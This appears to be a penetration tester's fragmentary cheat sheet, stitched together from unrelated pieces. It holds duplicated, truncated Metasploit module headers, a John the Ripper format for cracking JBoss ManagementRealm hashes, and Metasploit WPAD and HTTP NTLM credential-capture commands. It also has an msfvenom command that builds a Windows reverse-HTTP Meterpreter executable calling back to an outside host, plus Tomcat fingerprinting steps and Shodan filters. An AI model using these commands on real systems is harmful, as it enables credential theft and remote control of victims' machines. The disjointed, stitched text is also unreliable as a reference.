##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
/////////////////////////////////////////////////////////////////////////////////////////////
Add these lines to JtR /run/dynamic.conf:
/////////////////////////////////////////////////////////////////////////////////////////////
[List.Generic:dynamic_1591]
Expression=md5($u:ManagementRealm:$p)
CONST1=:ManagementRealm:
Flag=MGF_USERNAME
Flag=MGF_NOTSSE2Safe
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_userid
http://wtfismyip.com/
http://web-sniffer.net/
http://www.urlquery.net/
http://www.rexswain.com/httpview.html
http://httpbin.org
http://requestb.in
use auxiliary/server/wpad
set PROXY x.x.x.x
run
use auxiliary/server/capture/http_ntlm
set CAINPWFILE /root/cain.http.pw
set JOHNPWFILE /root/john.http.pw
set URIPATH /
set SRVPORT 80
run
3999,5000,5005,8000,8453,8787-8788,9001,18000
.../metasploit_4.11.3-2015062101-1kali0_i386.deb
root@kali:~# msfvenom -p windows/meterpreter_reverse_http exitfunc=thread lhost=1.1.1.5 R -a x86 -f exe --platform windows > meter_1.1.1.5.exe
No encoder or badchars specified, outputting raw payload
//tomcat version
get and unzip $TOMCAT_HOME/server/lib/catalina.jar
cat org/apache/catalina/util/ServerInfo.properties
cat META-INF/MANIFEST.MF
grep -ri version * | more
(...)
META-INF/MANIFEST.MF:Specification-Version: 6.0
META-INF/MANIFEST.MF:Implementation-Version: 6.0.35
» city
» country
nginx city:"San Diego" country:US
» geo
Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50
» hostname
"Server: gws" hostname:google
» net
net:216.219.0.0/16
» os